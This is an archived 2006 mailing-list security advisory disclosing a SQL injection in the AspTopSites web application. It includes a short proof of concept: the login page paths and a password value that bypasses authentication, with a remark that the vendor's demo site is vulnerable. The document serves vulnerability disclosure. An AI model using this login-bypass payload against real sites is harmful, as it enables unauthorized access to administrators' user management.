| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue Jan 10 19:24:35 2006
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: AspTopSites SQL injection
------------------------------------------------------------
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
- AspTopSites -
AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp
OVERVIEW
========
AspTopSites? runs on your Windows NT/2K/2003 Server
and uses Active Server Pages with a MS Access 2000 database.
Simply upload AspTopSites?, make one configuration setting
and you're ready to start running your own TopSites traffic
generator. AspTopSites? comes with full source code...
no encoding or DLLs need to be installed on the server.
DETAILS
=======
1. SQL Injection
AspTopSites does not filter SQL resulting in
full access to the user manager menu.
POC
===
1.
---
entering SQL Injection type statement in the password field
causes the statement to be true.
http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'
note: Vendor Demo Site is Vuln
SOLUTION:
=========
vendor contact:
Jan 3, 2006 wills@...ne-net.com ( no resp )
Jan 10, 2006 ( no resp => release )
Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
Powered by blists - more mailing lists